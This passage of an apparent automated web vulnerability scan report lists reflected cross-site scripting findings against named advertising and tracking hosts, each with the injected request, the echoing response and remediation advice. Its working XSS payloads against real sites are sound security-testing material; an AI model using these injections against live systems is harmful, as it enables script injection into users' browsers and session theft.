+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:49 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
17682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...

4.69. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e30d8'-alert(1)-'5040089bc5a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:36 GMT
Content-Length: 1707

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...

4.70. http://ib.adnxs.com/ab [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67532'-alert(1)-'10502941372 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:54:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:54:03 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1">
...[SNIP]...

4.71. http://ib.adnxs.com/ab [tt_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d69e'-alert(1)-'14515927802 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 1811

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950
...[SNIP]...

4.72. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ac054<script>alert(1)</script>48115ead9b3 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07611ac054<script>alert(1)</script>48115ead9b3 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 02 Oct 2011 23:48:55 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 03 Oct 2011 23:48:55 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:48:55 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07611AC054<SCRIPT>ALERT(1)</SCRIPT>48115EAD9B3" was not recognized.
*/

4.73. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 195d1"><script>alert(1)</script>213e8a8c6c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire195d1"><script>alert(1)</script>213e8a8c6c0/retargeting_hotel_results@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:48 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire195d1"><script>alert(1)</script>213e8a8c6c0/retargeting_hotel_results/1246322903/Bottom3/default/empty.gif/4d686437616b364a424c674141505766?" target="_top">
...[SNIP]...

4.74. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae78c"><script>alert(1)</script>e05ce80092f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3ae78c"><script>alert(1)</script>e05ce80092f HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:51 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire/retargeting_hotel_results/1898594671/Bottom3ae78c"><script>alert(1)</script>e05ce80092f/default/empty.gif/4d686437616b364a424c674141505766?" target="_top">
...[SNIP]...

4.75. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa772"><script>alert(1)</script>983e8dd70cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3?aa772"><script>alert(1)</script>983e8dd70cf=1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 371
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:44 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire/retargeting_hotel_results/1145901499/Bottom3/default/empty.gif/4d686437616b364a424c674141505766?aa772"><script>alert(1)</script>983e8dd70cf=1" target="_top">
...[SNIP]...

4.76. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 52c2f<script>alert(1)</script>3bcae053672 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPage=1317600562009-125559&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=1&numberOfNights=3&numberOfRooms=1&hotelSRNavigationSegment=1&mbox=HOTEL200_SR_Navigation52c2f<script>alert(1)</script>3bcae053672&mboxId=0&mboxTime=1317582580525&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 218
Date: Mon, 03 Oct 2011 00:11:46 GMT
Server: Test & Target

mboxFactories.get('default').get('HOTEL200_SR_Navigation52c2f<script>alert(1)</script>3bcae053672',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317600406536-142286.19");

4.77. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4e803<script>alert(1)</script>d023063abdc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/orbitzaway/mbox/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=1&mbox=trip_landing_vacation_pkgs4e803<script>alert(1)</script>d023063abdc&mboxId=0&mboxTime=1317584100633&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
